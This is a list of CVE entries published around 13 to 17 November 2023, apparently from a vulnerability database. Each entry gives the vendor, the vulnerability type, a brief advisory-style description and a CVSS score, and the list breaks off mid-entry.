2023-11-14 CVE-2023-47640 Datahub Project Use of a Broken or Risky Cryptographic Algorithm vulnerability in Datahub Project Datahub

DataHub is an open-source metadata platform.

8.8
2023-11-14 CVE-2023-5528 Kubernetes, Fedoraproject

A security issue was discovered in Kubernetes where a user that can create pods and persistent volumes on Windows nodes may be able to escalate to admin privileges on those nodes.

8.8
2023-11-14 CVE-2023-22663 Intel Improper Authentication vulnerability in Intel Unison Software

Improper authentication for some Intel Unison software may allow an authenticated user to potentially enable escalation of privilege via network access.

8.8
2023-11-14 CVE-2023-32641 Intel Unspecified vulnerability in Intel Quickassist Technology

Improper input validation in firmware for Intel(R) QAT before version QAT20.L.1.0.40-00004 may allow escalation of privilege and denial of service via adjacent access.

8.8
2023-11-14 CVE-2023-36860 Intel Improper Input Validation vulnerability in Intel Unison Software

Improper input validation for some Intel Unison software may allow an authenticated user to potentially enable escalation of privilege via network access.

8.8
2023-11-14 CVE-2023-39221 Intel Unspecified vulnerability in Intel Unison Software

Improper access control for some Intel Unison software may allow an authenticated user to potentially enable escalation of privilege via network access.

8.8
2023-11-14 CVE-2023-39412 Intel Cross-Site Request Forgery (CSRF) vulnerability in Intel Unison Software

Cross-site request forgery in some Intel Unison software may allow an authenticated user to potentially enable escalation of privilege via network access.

8.8
2023-11-14 CVE-2023-26205 Fortinet Improper Access Control vulnerability in Fortinet Fortiadc

An improper access control vulnerability [CWE-284] in FortiADC automation feature 7.1.0 through 7.1.2, 7.0 all versions, 6.2 all versions, 6.1 all versions may allow an authenticated low-privileged attacker to escalate their privileges to super_admin via a specific crafted configuration of fabric automation CLI script.

8.8
2023-11-14 CVE-2023-36017 Microsoft Out-of-bounds Write vulnerability in Microsoft products

Windows Scripting Engine Memory Corruption Vulnerability

8.8
2023-11-14 CVE-2023-36025 Microsoft Unspecified vulnerability in Microsoft products

Windows SmartScreen Security Feature Bypass Vulnerability

8.8
2023-11-14 CVE-2023-36400 Microsoft Unspecified vulnerability in Microsoft products

Windows HMAC Key Derivation Elevation of Privilege Vulnerability

8.8
2023-11-14 CVE-2023-36402 Microsoft Unspecified vulnerability in Microsoft products

Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability

8.8
2023-11-14 CVE-2023-36423 Microsoft Unspecified vulnerability in Microsoft products

Microsoft Remote Registry Service Remote Code Execution Vulnerability

8.8
2023-11-14 CVE-2023-36560 Microsoft Unspecified vulnerability in Microsoft .Net Framework

ASP.NET Security Feature Bypass Vulnerability

8.8
2023-11-14 CVE-2023-38151 Microsoft Unspecified vulnerability in Microsoft Host Integration Server and OLE DB Provider

Microsoft Host Integration Server 2020 Remote Code Execution Vulnerability

8.8
2023-11-14 CVE-2023-6130 Salesagility Path Traversal: '..filename' vulnerability in Salesagility Suitecrm

Path Traversal: '\..\filename' in GitHub repository salesagility/suitecrm prior to 7.14.2, 7.12.14, 8.4.2.

8.8
2023-11-14 CVE-2023-6131 Salesagility Code Injection vulnerability in Salesagility Suitecrm

Code Injection in GitHub repository salesagility/suitecrm prior to 7.14.2, 7.12.14, 8.4.2.

8.8
2023-11-14 CVE-2023-6125 Salesagility Code Injection vulnerability in Salesagility Suitecrm

Code Injection in GitHub repository salesagility/suitecrm prior to 7.14.2, 7.12.14, 8.4.2.

8.8
2023-11-14 CVE-2023-48020 Iteachyou Cross-Site Request Forgery (CSRF) vulnerability in Iteachyou Dreamer CMS 4.1.3

Dreamer CMS v4.1.3 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/task/changeStatus.

8.8
2023-11-14 CVE-2023-48021 Iteachyou Cross-Site Request Forgery (CSRF) vulnerability in Iteachyou Dreamer CMS 4.1.3

Dreamer CMS v4.1.3 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/task/update.

8.8
2023-11-14 CVE-2023-44374 Siemens Unsynchronized Access to Shared Data in a Multithreaded Context vulnerability in Siemens products

Affected devices allow the password to be changed, but insufficiently check which password is to be changed.

8.8
2023-11-14 CVE-2023-46098 Siemens Overly Permissive Cross-domain Whitelist vulnerability in Siemens Simatic PCS NEO 3.0

A vulnerability has been identified in SIMATIC PCS neo (All versions < V4.1).

8.8
2023-11-14 CVE-2023-47609 OSS Calendar SQL Injection vulnerability in Oss-Calendar OSS Calendar

SQL injection vulnerability in OSS Calendar versions prior to v.2.0.3 allows a remote authenticated attacker to execute arbitrary code or obtain and/or alter the information stored in the database by sending a specially crafted request.

8.8
2023-11-14 CVE-2023-42326 Netgate Command Injection vulnerability in Netgate Pfsense and Pfsense Plus

An issue in Netgate pfSense v.2.7.0 allows a remote attacker to execute arbitrary code via a crafted request to the interfaces_gif_edit.php and interfaces_gre_edit.php components.

8.8
2023-11-13 CVE-2023-47621 Duncanmcclean Unrestricted Upload of File with Dangerous Type vulnerability in Duncanmcclean Guest Entries

Guest Entries is a php library which allows users to create, update & delete entries from the front-end of a site.

8.8
2023-11-13 CVE-2023-48058 Dreamer CMS Project Cross-Site Request Forgery (CSRF) vulnerability in Dreamer CMS Project Dreamer CMS 4.1.3

Dreamer CMS v4.1.3 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/task/run

8.8
2023-11-13 CVE-2023-48060 Dreamer CMS Project Cross-Site Request Forgery (CSRF) vulnerability in Dreamer CMS Project Dreamer CMS 4.1.3

Dreamer CMS v4.1.3 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/task/add

8.8
2023-11-13 CVE-2023-6097 Icssolution SQL Injection vulnerability in Icssolution ICS Business Manager 7.06.0028.2802/7.06.0028.7066/7.06.0028.7089

A SQL injection vulnerability has been found in ICS Business Manager, affecting version 7.06.0028.7089.

8.8
2023-11-13 CVE-2023-5747 Hanwhavision Improper Verification of Cryptographic Signature vulnerability in Hanwhavision products

Bashis, a Security Researcher at IPVM, has found a flaw that allows for remote code execution during the installation of Wave on the camera device.

8.8
2023-11-13 CVE-2023-35041 Webpushr Cross-Site Request Forgery (CSRF) vulnerability in Webpushr web Push Notifications

Cross-Site Request Forgery (CSRF) vulnerability leading to Local File Inclusion (LFI) in Webpushr Web Push Notifications – Webpushr plugin <= 4.34.0 versions.

8.8
2023-11-13 CVE-2023-32583 Walkeprashant Cross-Site Request Forgery (CSRF) vulnerability in Walkeprashant WP ALL Backup

Cross-Site Request Forgery (CSRF) vulnerability in Prashant Walke WP All Backup plugin <= 2.4.3 versions.

8.8
2023-11-13 CVE-2023-32588 Brandbrilliance Cross-Site Request Forgery (CSRF) vulnerability in Brandbrilliance Post State Tags

Cross-Site Request Forgery (CSRF) vulnerability in BRANDbrilliance Post State Tags plugin <= 2.0.6 versions.

8.8
2023-11-13 CVE-2023-33207 Wielogorski Cross-Site Request Forgery (CSRF) vulnerability in Wielogorski Stop Referrer Spam

Cross-Site Request Forgery (CSRF) vulnerability in Krzysztof Wielogórski Stop Referrer Spam plugin <= 1.3.0 versions.

8.8
2023-11-13 CVE-2023-34378 Scriptburn Cross-Site Request Forgery (CSRF) vulnerability in Scriptburn WP Hide Post

Cross-Site Request Forgery (CSRF) vulnerability in scriptburn.Com WP Hide Post plugin <= 2.0.10 versions.

8.8
2023-11-13 CVE-2023-34384 Kebo Twitter Feed Project Cross-Site Request Forgery (CSRF) vulnerability in Kebo Twitter Feed Project Kebo Twitter Feed

Cross-Site Request Forgery (CSRF) vulnerability in Kebo Kebo Twitter Feed plugin <= 1.5.12 versions.

8.8
2023-11-13 CVE-2023-47669 Cozmoslabs Cross-Site Request Forgery (CSRF) vulnerability in Cozmoslabs Profile Builder

Cross-Site Request Forgery (CSRF) vulnerability in Cozmoslabs User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor plugin <= 3.10.3 versions.

8.8
2023-11-13 CVE-2023-26531 Wbolt Cross-Site Request Forgery (CSRF) vulnerability in Wbolt All-In-One Search Automatic Push Management

Cross-Site Request Forgery (CSRF) vulnerability in Wbolt All-In-One Search Automatic Push Management (Baidu/Google/Bing/IndexNow/Yandex) plugin <= 4.2.7 versions.

8.8
2023-11-13 CVE-2023-26543 WP Meteor Cross-Site Request Forgery (CSRF) vulnerability in Wp-Meteor WP Meteor

Cross-Site Request Forgery (CSRF) vulnerability in Aleksandr Guidrevitch WP Meteor Website Speed Optimization Addon plugin <= 3.1.4 versions.

8.8
2023-11-13 CVE-2023-46618 Bala Krishna Cross-Site Request Forgery (CSRF) vulnerability in Bala-Krishna Category SEO Meta Tags

Cross-Site Request Forgery (CSRF) vulnerability in Bala Krishna, Sergey Yakovlev Category SEO Meta Tags plugin <= 2.5 versions.

8.8
2023-11-13 CVE-2023-46619 WEB Dorado Cross-Site Request Forgery (CSRF) vulnerability in Web-Dorado Wdsocialwidgets

Cross-Site Request Forgery (CSRF) vulnerability in WebDorado WDSocialWidgets plugin <= 1.0.15 versions.

8.8
2023-11-13 CVE-2023-46620 Fluenx Cross-Site Request Forgery (CSRF) vulnerability in Fluenx Deepl API Translation

Cross-Site Request Forgery (CSRF) vulnerability in Fluenx DeepL API translation plugin <= 2.3.9.1 versions.

8.8
2023-11-13 CVE-2023-46625 Daext Cross-Site Request Forgery (CSRF) vulnerability in Daext Autolinks Manager

Cross-Site Request Forgery (CSRF) vulnerability in DAEXT Autolinks Manager plugin <= 1.10.04 versions.

8.8
2023-11-13 CVE-2023-46629 Themelocation Cross-Site Request Forgery (CSRF) vulnerability in Themelocation Remove ADD to Cart Woocommerce

Cross-Site Request Forgery (CSRF) vulnerability in themelocation Remove Add to Cart WooCommerce plugin <= 1.4.4.

8.8
2023-11-13 CVE-2023-46636 Blackbam Cross-Site Request Forgery (CSRF) vulnerability in Blackbam Custom Header Images

Cross-Site Request Forgery (CSRF) vulnerability in David Stöckl Custom Header Images plugin <= 1.2.1 versions.

8.8
2023-11-13 CVE-2023-46638 Webcodin Cross-Site Request Forgery (CSRF) vulnerability in Webcodin WCP Openweather

Cross-Site Request Forgery (CSRF) vulnerability in Webcodin WCP OpenWeather plugin <= 2.5.0 versions.

8.8
2023-11-13 CVE-2023-47230 Cimatti Cross-Site Request Forgery (CSRF) vulnerability in Cimatti Wordpress Contact Forms

Cross-Site Request Forgery (CSRF) vulnerability in Cimatti Consulting WordPress Contact Forms by Cimatti plugin <= 1.6.0 versions.

8.8
2023-11-13 CVE-2023-26514 Wpgrim Cross-Site Request Forgery (CSRF) vulnerability in Wpgrim Dynamic XML Sitemaps Generator for Google

Cross-Site Request Forgery (CSRF) vulnerability in WPGrim Dynamic XML Sitemaps Generator for Google plugin <= 1.3.3 versions.

8.8
2023-11-13 CVE-2023-26516 Wpindeed Cross-Site Request Forgery (CSRF) vulnerability in Wpindeed Debug Assistant

Cross-Site Request Forgery (CSRF) vulnerability in WPIndeed Debug Assistant plugin <= 1.4 versions.

8.8
2023-11-13 CVE-2023-26518 Accesspressthemes Cross-Site Request Forgery (CSRF) vulnerability in Accesspressthemes WP Tfeed

Cross-Site Request Forgery (CSRF) vulnerability in AccessPress Themes WP TFeed plugin <= 1.6.9 versions.

8.8
2023-11-13 CVE-2023-26524 Expresstech Cross-Site Request Forgery (CSRF) vulnerability in Expresstech Quiz and Survey Master

Cross-Site Request Forgery (CSRF) vulnerability in ExpressTech Quiz And Survey Master – Best Quiz, Exam and Survey Plugin for WordPress plugin <= 8.0.10 versions.

8.8
2023-11-13 CVE-2023-27434 Wpgrim Cross-Site Request Forgery (CSRF) vulnerability in Wpgrim Classic Editor and Classic Widgets

Cross-Site Request Forgery (CSRF) vulnerability in WPGrim Classic Editor and Classic Widgets plugin <= 1.2.5 versions.

8.8
2023-11-13 CVE-2023-27436 Breakdance Cross-Site Request Forgery (CSRF) vulnerability in Breakdance Elegant Custom Fonts

Cross-Site Request Forgery (CSRF) vulnerability in Louis Reingold Elegant Custom Fonts plugin <= 1.0 versions.

8.8
2023-11-13 CVE-2023-27438 Yur4Enko Cross-Site Request Forgery (CSRF) vulnerability in Yur4Enko WP Translitera

Cross-Site Request Forgery (CSRF) vulnerability in Evgen Yurchenko WP Translitera plugin <= p1.2.5 versions.

8.8
2023-11-13 CVE-2023-27441 NEW Adman Project Cross-Site Request Forgery (CSRF) vulnerability in NEW Adman Project NEW Adman 1.6.7.2/1.6.8

Cross-Site Request Forgery (CSRF) vulnerability in gl_SPICE New Adman plugin <= 1.6.8 versions.

8.8
2023-11-13 CVE-2023-27445 Meril Cross-Site Request Forgery (CSRF) vulnerability in Meril Blog Floating Button

Cross-Site Request Forgery (CSRF) vulnerability in Meril Inc.

8.8
2023-11-14 CVE-2023-36052 Microsoft Unspecified vulnerability in Microsoft Azure CLI

Azure CLI REST Command Information Disclosure Vulnerability

8.6
2023-11-14 CVE-2023-45617 Arubanetworks, HP

There are arbitrary file deletion vulnerabilities in the CLI service accessed by PAPI (Aruba's access point management protocol).

8.2
2023-11-14 CVE-2023-45618 Arubanetworks, HP

There are arbitrary file deletion vulnerabilities in the AirWave client service accessed by PAPI (Aruba's access point management protocol).

8.2
2023-11-14 CVE-2023-45619 Arubanetworks, HP

There is an arbitrary file deletion vulnerability in the RSSI service accessed by PAPI (Aruba's access point management protocol).

8.2
2023-11-17 CVE-2023-48025 Howerj Out-of-bounds Read vulnerability in Howerj Liblisp

Liblisp through commit 4c65969 was discovered to contain an out-of-bounds read vulnerability in unsigned get_length(lisp_cell_t *x) in eval.c.

8.1
2023-11-17 CVE-2023-38130 Cubecart Cross-Site Request Forgery (CSRF) vulnerability in Cubecart

Cross-site request forgery (CSRF) vulnerability in CubeCart prior to 6.5.3 allows a remote unauthenticated attacker to delete data in the system.

8.1
2023-11-14 CVE-2023-20571 AMD Race Condition vulnerability in AMD products

A race condition in System Management Mode (SMM) code may allow an attacker using a compromised user space to leverage CVE-2018-8897 potentially resulting in privilege escalation.

8.1
2023-11-14 CVE-2023-45794 Siemens Authentication Bypass by Capture-replay vulnerability in Siemens Mendix

A vulnerability has been identified in Mendix Applications using Mendix 10 (All versions < V10.4.0), Mendix Applications using Mendix 7 (All versions < V7.23.37), Mendix Applications using Mendix 8 (All versions < V8.18.27), Mendix Applications using Mendix 9 (All versions < V9.24.10).

8.1
2023-11-17 CVE-2023-48029 Corebos Improper Neutralization of Formula Elements in a CSV File vulnerability in Corebos

Corebos 8.0 and below is vulnerable to CSV Injection.

8.0
2023-11-17 CVE-2023-5444 Mcafee Cross-Site Request Forgery (CSRF) vulnerability in Mcafee Epolicy Orchestrator

A Cross Site Request Forgery vulnerability in ePolicy Orchestrator prior to 5.10.0 CP1 Update 2 allows a remote low privilege user to successfully add a new user with administrator privileges to the ePO server.

8.0
2023-11-16 CVE-2023-43752 Elecom OS Command Injection vulnerability in Elecom products

OS command injection vulnerability in WRC-X3000GS2-W v1.05 and earlier, WRC-X3000GS2-B v1.05 and earlier, and WRC-X3000GS2A-B v1.05 and earlier allows a network-adjacent authenticated user to execute an arbitrary OS command by sending a specially crafted request.

8.0
2023-11-14 CVE-2023-25756 Intel Out-of-bounds Read vulnerability in Intel products

Out-of-bounds read in the BIOS firmware for some Intel(R) Processors may allow an authenticated user to potentially enable escalation of privilege via adjacent access.

8.0
2023-11-14 CVE-2023-36021 Microsoft Unspecified vulnerability in Microsoft On-Prem Data Gateway

Microsoft On-Prem Data Gateway Security Feature Bypass Vulnerability

8.0
2023-11-14 CVE-2023-36035 Microsoft Unspecified vulnerability in Microsoft Exchange Server 2016/2019

Microsoft Exchange Server Spoofing Vulnerability

8.0
2023-11-14 CVE-2023-36039 Microsoft Unspecified vulnerability in Microsoft Exchange Server 2016/2019

Microsoft Exchange Server Spoofing Vulnerability

8.0
2023-11-14 CVE-2023-36050 Microsoft Unspecified vulnerability in Microsoft Exchange Server 2016/2019

Microsoft Exchange Server Spoofing Vulnerability

8.0
2023-11-14 CVE-2023-36425 Microsoft Unspecified vulnerability in Microsoft products

Windows Distributed File System (DFS) Remote Code Execution Vulnerability

8.0
2023-11-14 CVE-2023-36439 Microsoft Unspecified vulnerability in Microsoft Exchange Server 2016/2019

Microsoft Exchange Server Remote Code Execution Vulnerability

8.0
2023-11-14 CVE-2023-46097 Siemens SQL Injection vulnerability in Siemens Simatic PCS NEO 3.0

A vulnerability has been identified in SIMATIC PCS neo (All versions < V4.1).

8.0
2023-11-14 CVE-2023-31403 SAP Incorrect Authorization vulnerability in SAP Business ONE 10.0

SAP Business One installation, version 10.0, does not perform proper authentication and authorization checks for the SMB shared folder.

8.0
2023-11-14 CVE-2023-47629 Datahub Project Improper Privilege Management vulnerability in Datahub Project Datahub

DataHub is an open-source metadata platform.

8.0
2023-11-17 CVE-2023-6179 Honeywell Incorrect Permission Assignment for Critical Resource vulnerability in Honeywell Prowatch 4.5

Honeywell ProWatch, 4.5, including all Service Pack versions, contain a Vulnerability in Application Server's executable folder(s).

7.8
2023-11-17 CVE-2023-47066 Adobe Out-of-bounds Read vulnerability in Adobe After Effects 24.0

Adobe After Effects version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure.

7.8
2023-11-17 CVE-2023-47067 Adobe Out-of-bounds Read vulnerability in Adobe After Effects 24.0

Adobe After Effects version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure.

7.8
2023-11-17 CVE-2023-47068 Adobe Out-of-bounds Read vulnerability in Adobe After Effects 24.0

Adobe After Effects version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure.

7.8
2023-11-17 CVE-2023-47069 Adobe Out-of-bounds Read vulnerability in Adobe After Effects 24.0

Adobe After Effects version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure.

7.8
2023-11-17 CVE-2023-47070 Adobe Out-of-bounds Write vulnerability in Adobe After Effects 24.0

Adobe After Effects version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user.

7.8
2023-11-17 CVE-2023-47073 Adobe Out-of-bounds Write vulnerability in Adobe After Effects 24.0

Adobe After Effects version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user.

7.8
2023-11-16 CVE-2023-47055 Adobe Use After Free vulnerability in Adobe Premiere PRO

Adobe Premiere Pro version 24.0 (and earlier) and 23.6 (and earlier) are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user.

7.8
2023-11-16 CVE-2023-47056 Adobe Out-of-bounds Write vulnerability in Adobe Premiere PRO

Adobe Premiere Pro version 24.0 (and earlier) and 23.6 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user.

7.8
2023-11-16 CVE-2023-47057 Adobe Out-of-bounds Write vulnerability in Adobe Premiere PRO

Adobe Premiere Pro version 24.0 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user.

7.8
2023-11-16 CVE-2023-47058 Adobe Out-of-bounds Read vulnerability in Adobe Premiere PRO

Adobe Premiere Pro version 24.0 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure.

7.8
2023-11-16 CVE-2023-47059 Adobe Out-of-bounds Read vulnerability in Adobe Premiere PRO

Adobe Premiere Pro version 24.0 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure.

7.8
2023-11-16 CVE-2023-26368 Adobe Out-of-bounds Read vulnerability in Adobe Incopy

Adobe InCopy versions 18.5 (and earlier) and 17.4.2 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure.

7.8
2023-11-16 CVE-2023-47047 Adobe Access of Uninitialized Pointer vulnerability in Adobe Audition

Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could result in arbitrary code execution in the context of the current user.

7.8
2023-11-16 CVE-2023-44330 Adobe Out-of-bounds Write vulnerability in Adobe Photoshop

Adobe Photoshop versions 24.7.1 (and earlier) and 25.0 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user.

7.8
2023-11-16 CVE-2023-47040 Adobe Out-of-bounds Read vulnerability in Adobe Media Encoder

Adobe Media Encoder version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure.

7.8
2023-11-16 CVE-2023-47041 Adobe Out-of-bounds Write vulnerability in Adobe Media Encoder

Adobe Media Encoder version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user.

7.8
2023-11-16 CVE-2023-47042 Adobe Out-of-bounds Write vulnerability in Adobe Media Encoder

Adobe Media Encoder version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user.

7.8
2023-11-16 CVE-2023-47043 Adobe Out-of-bounds Read vulnerability in Adobe Media Encoder

Adobe Media Encoder version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure.

7.8
2023-11-16 CVE-2023-44282 Dell Improper Privilege Management vulnerability in Dell Repository Manager 1.1.52/1.2.155/1.3.124

Dell Repository Manager, 3.4.3 and prior, contains an Improper Access Control vulnerability in its installation module.

7.8
2023-11-16 CVE-2023-44292 Dell Improper Privilege Management vulnerability in Dell Repository Manager 1.1.52/1.2.155/1.3.124

Dell Repository Manager, 3.4.3 and prior, contains an Improper Access Control vulnerability in its installation module.

7.8
2023-11-16 CVE-2023-44336 Adobe Use After Free vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user.

7.8
2023-11-16 CVE-2023-44337 Adobe Out-of-bounds Read vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure.

7.8
2023-11-16 CVE-2023-44338 Adobe Out-of-bounds Read vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure.

7.8
2023-11-16 CVE-2023-44359 Adobe Use After Free vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user.

7.8
2023-11-16 CVE-2023-44365 Adobe Access of Uninitialized Pointer vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could result in arbitrary code execution in the context of the current user.

7.8
2023-11-16 CVE-2023-44366 Adobe Out-of-bounds Write vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user.

7.8
2023-11-16 CVE-2023-44367 Adobe Use After Free vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user.

7.8
2023-11-16 CVE-2023-44371 Adobe Use After Free vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user.

7.8
2023-11-16 CVE-2023-44372 Adobe Use After Free vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user.

7.8
2023-11-16 CVE-2023-6119 Trellix Improper Privilege Management vulnerability in Trellix Getsusp

An Improper Privilege Management vulnerability in Trellix GetSusp prior to version 5.0.0.27 allows a local, low privilege attacker to gain access to files that usually require a higher privilege level.

7.8
2023-11-16 CVE-2023-39259 Dell Unspecified vulnerability in Dell OS Recovery Tool 2.2.4013/2.3.7012.0/2.3.7515.0

Dell OS Recovery Tool, versions 2.2.4013, 2.3.7012.0, and 2.3.7515.0 contain an Improper Access Control Vulnerability.

7.8
2023-11-16 CVE-2023-47470 Ffmpeg Out-of-bounds Write vulnerability in Ffmpeg

Buffer Overflow vulnerability in Ffmpeg before github commit 4565747056a11356210ed8edcecb920105e40b60 allows a remote attacker to achieve an out-of-array write, execute arbitrary code, and cause a denial of service (DoS) via the ref_pic_list_struct function in libavcodec/evc_ps.c.

7.8
2023-11-15 CVE-2023-48199 Grocy Project Injection vulnerability in Grocy Project Grocy 4.0.3

HTML Injection vulnerability in the 'manageApiKeys' component in Grocy <= 4.0.3 allows attackers to inject arbitrary HTML content without script execution.

7.8
2023-11-15 CVE-2023-22818 Westerndigital Uncontrolled Search Path Element vulnerability in Westerndigital Sandisk Security Installer

Multiple DLL Search Order Hijack vulnerabilities were addressed in the SanDisk Security Installer for Windows that could allow attackers with local access to execute arbitrary code by executing the installer in the same folder as the malicious DLL. This can lead to the execution of arbitrary code with the privileges of the vulnerable application, or to a certain level of persistence on the compromised host.

7.8
2023-11-15 CVE-2023-48011 Gpac Use After Free vulnerability in Gpac 2.3Devrev566G50C2Ab06Fmaster

GPAC v2.3-DEV-rev566-g50c2ab06f-master was discovered to contain a heap-use-after-free via the flush_ref_samples function at /gpac/src/isomedia/movie_fragments.c.

7.8
2023-11-15 CVE-2023-48013 Gpac Double Free vulnerability in Gpac 2.3Devrev566G50C2Ab06Fmaster

GPAC v2.3-DEV-rev566-g50c2ab06f-master was discovered to contain a double free via the gf_filterpacket_del function at /gpac/src/filter_core/filter.c.

7.8
2023-11-15 CVE-2023-48014 Gpac Out-of-bounds Write vulnerability in Gpac 2.3Devrev566G50C2Ab06Fmaster

GPAC v2.3-DEV-rev566-g50c2ab06f-master was discovered to contain a stack overflow via the hevc_parse_vps_extension function at /media_tools/av_parsers.c.

7.8
2023-11-15 CVE-2023-33873 Aveva Unspecified vulnerability in Aveva products

This privilege escalation vulnerability, if exploited, could allow a local OS-authenticated user with standard privileges to escalate to System privilege on the machine where these products are installed, resulting in complete compromise of the target machine.

7.8
2023-11-15 CVE-2023-47580 Fujielectric Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in Fujielectric Tellus and Tellus Lite

Multiple improper restriction of operations within the bounds of a memory buffer issues exist in TELLUS V4.0.17.0 and earlier and TELLUS Lite V4.0.17.0 and earlier.

7.8
2023-11-15 CVE-2023-47581 Fujielectric Out-of-bounds Read vulnerability in Fujielectric Tellus and Tellus Lite

Out-of-bounds read vulnerability exists in TELLUS V4.0.17.0 and earlier and TELLUS Lite V4.0.17.0 and earlier.

7.8
2023-11-15 CVE-2023-47582 Fujielectric Access of Uninitialized Pointer vulnerability in Fujielectric Tellus and Tellus Lite

Access of uninitialized pointer vulnerability exists in TELLUS V4.0.17.0 and earlier and TELLUS Lite V4.0.17.0 and earlier.

7.8
2023-11-15 CVE-2023-47583 Fujielectric Out-of-bounds Read vulnerability in Fujielectric Tellus 4.0.12.0/4.0.15.0

Multiple out-of-bounds read vulnerabilities exist in TELLUS Simulator V4.0.17.0 and earlier.

7.8
2023-11-15 CVE-2023-47584 Fujielectric Out-of-bounds Write vulnerability in Fujielectric V-Server

Out-of-bounds write vulnerability exists in V-Server V4.0.18.0 and earlier and V-Server Lite V4.0.18.0 and earlier.

7.8
2023-11-15 CVE-2023-47585 Fujielectric Out-of-bounds Read vulnerability in Fujielectric V-Server

Out-of-bounds read vulnerability exists in V-Server V4.0.18.0 and earlier and V-Server Lite V4.0.18.0 and earlier.

7.8
2023-11-15 CVE-2023-47586 Fujielectric Out-of-bounds Write vulnerability in Fujielectric V-Server

Multiple heap-based buffer overflow vulnerabilities exist in V-Server V4.0.18.0 and earlier and V-Server Lite V4.0.18.0 and earlier.

7.8
2023-11-15 CVE-2023-35080 Ivanti Unspecified vulnerability in Ivanti Secure Access Client

A vulnerability has been identified in the Ivanti Secure Access Windows client, which could allow a locally authenticated attacker to exploit a vulnerable configuration, potentially leading to various security risks, including the escalation of privileges, denial of service, or information disclosure.

7.8
2023-11-15 CVE-2023-38043 Ivanti Unspecified vulnerability in Ivanti Secure Access Client

A vulnerability exists on all versions of the Ivanti Secure Access Client below 22.6R1.1, which could allow a locally authenticated attacker to exploit a vulnerable configuration, potentially leading to a denial of service (DoS) condition on the user machine and, in some cases, resulting in a full compromise of the system.

7.8
2023-11-15 CVE-2023-38543 Ivanti Unspecified vulnerability in Ivanti Secure Access Client

A vulnerability exists on all versions of the Ivanti Secure Access Client below 22.6R1.1, which could allow a locally authenticated attacker to exploit a vulnerable configuration, potentially leading to a denial of service (DoS) condition on the user machine.

7.8
2023-11-15 CVE-2023-41718 Ivanti Unspecified vulnerability in Ivanti Secure Access Client 22.2/22.3

When a particular process flow is initiated, an attacker may be able to gain unauthorized elevated privileges on the affected system when having control over a specific file.

7.8
2023-11-15 CVE-2023-43590 Zoom Link Following vulnerability in Zoom Rooms

Link following in Zoom Rooms for macOS before version 5.16.0 may allow an authenticated user to conduct an escalation of privilege via local access.

7.8
2023-11-15 CVE-2023-43591 Zoom Unspecified vulnerability in Zoom Rooms

